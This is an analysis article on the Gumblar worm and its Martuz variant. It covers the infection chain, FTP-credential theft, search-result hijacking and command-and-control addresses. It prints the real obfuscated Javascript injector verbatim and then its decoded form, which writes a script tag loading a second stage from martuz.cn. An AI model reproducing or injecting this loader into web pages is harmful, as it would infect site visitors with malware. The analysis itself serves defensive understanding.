What is it?

Gumblar is the latest in a series of worm infestations that started with the Conficker outbreak in late 2008. Gumblar is a worm in two halves – a server infection with associated botnet, and a client infection with associated botnet.

Though the attack is circular, lets assume, for the sake of argument, that the attack begins with a victim browsing to an infected website. The site is infected with an injected Javascript. This Javascript downloads a further Javscript from one of a series of Chinese servers (most of these are now blacklisted). This script attempts to load up exploited PDF and Flash files to ultimately exploit the victim machine. Like Conficker, Gumblar uses patched vulnerabilities, so only users without fully patched systems will be vulnerable. That’s most of them, then…

When the victim client machine has been exploited, Gumblar alters links on the Google results page. According to Scansafe:

When infected users perform certain Google searches, the search engine results page (SERP) is manipulated so that affiliate links are replacing the legitimate links. Cookie stuffing is used so that the links presented appear normal, i.e. the affiliate ID is not exposed, but the rogue affiliate gets full credit for the unintended click through.

The motivation for this activity, and presumably the worm in general, appears to be financial.

The client side malware itself registers as an auxillary sound driver and is thus loaded when any sound-enabled application is launched. It sits in the background sniffing for FTP credentials that could be used for masquarading into web servers and infecting further sites.

Scansafe conducted some additional analysis against the client side malware and found that:

The gumblar.cn compromise may also be accompanied by malicious iframes that load exploits and malware from domains hosted at 213.182.197.23, including liteautotop.cn, bigtruckstopseek.cn, autobestwestern.cn and several others. Both the 94.247.2.195 and 213.182.197.23 addresses are hosted in Latvia whereas the gumblar.cn domain has a Moscow IP that reverses to ukservers.com. Coincidentally, the malware loaded in the most recent round of attacks results in the installation of a backdoor that attempts to communicate with a botnet command & control located at 78.109.29.112 – a bot c&c with past ties to malware engaged in forcible redirects.

How Extensive is the Infection?
Google have been carrying out systematic delisting of infected sites to help stem the epidemic. Their near global view of the content of all public websites allows them to collate infection statistics. The June ‘09 stats clearly show gumblar.cn and martuz.cn in the lead for number of websites linking to them – 100,000:

In depth analysis
This article starts with a run through of the client side infection, which is encoded Javascript. The encoded Gumblar script is taken from Unmask Parasites and is actually an example of Martuz, an evolved and more sophisticated Gumblar attack.

(function() {
var G33z1='%';
var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';
var m8nw=KlKj.replace(/-/g,G33z1);
eval(unescape(m8nw))
})();

When this code is placed on infected websites it is dynamically generated to avoid pattern based AV systems. Each infestation of Gumblar could be different. The encoding used is URL escaping – each ASCII character has an escape code that consists of a two digit hex number preceeded by a % sign. ‘a’, for example escapes to its ASCII hex equivalent of ‘%61′. Usually these codes are used to escape special characters (space, ?, &) in variables when passed as GET parameters in a URL. A method exists (see the tutorial here) in Javascript to ‘unscape’ a string from its escaped form to plain text. For later reference, the ASCII codes are:

Gumblar further obfuscates itself by replacing the ‘%’ character with a randomly generated (non hex) digit. In our example, ‘%’ is replaced with ‘-’.

The variable ‘G33Z1′ (again randomly named) holds the ‘%’ for later replacement. ‘KlKj’ is the encoded script. Note that not the whole string is encoded – the substring ‘d-6fcument-2ecookie’ is clearly visible with only ‘%6f’ replacing ‘o’ and ‘%2e’ replacing ‘.’.

The ‘-’ marks are replaced with ‘%’ using a regular expression matcher:

var m8nw=KlKj.replace(/-/g,G33z1);

and finally the properly encoded string is decoded with unescape and executed with an eval call.

eval(unescape(m8nw))

So, what does the decoded script look like, and more importantly what does it do? The example that we’re working through is actually an evolved version of Gumblar, known as Martuz:

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && ( u.indexOf("NT 6") < 0 ) && (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A"))){
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");
}

Although executable, the code is still somewhat obfuscated. Initially it checks the browser is not Google Chrome, that the system is running Windows, that it isn't running NT6 (Vista) and that it doesn't have a cookie set called 'miek'. It also checks that the variable 'zrvzts' isn't a string - presumably, given that zrvzts is defined on the next line, to determine whether the script has already been injected onto the page.

If the preliminary checks pass, the worm evaluates a further obfuscated string designed to check for a ScriptEngine. If one is discovered, its details are saved until the variable 'j', presumably for later use.

if(window.ScriptEngine)j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;

Lastly the code inserts a script call to download a javascript from a Chinese server. The original Gumblar worm was named after its rendezvous domain - gumblar.cn. This example downloads its second stage from martuz.cn.

document.write("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");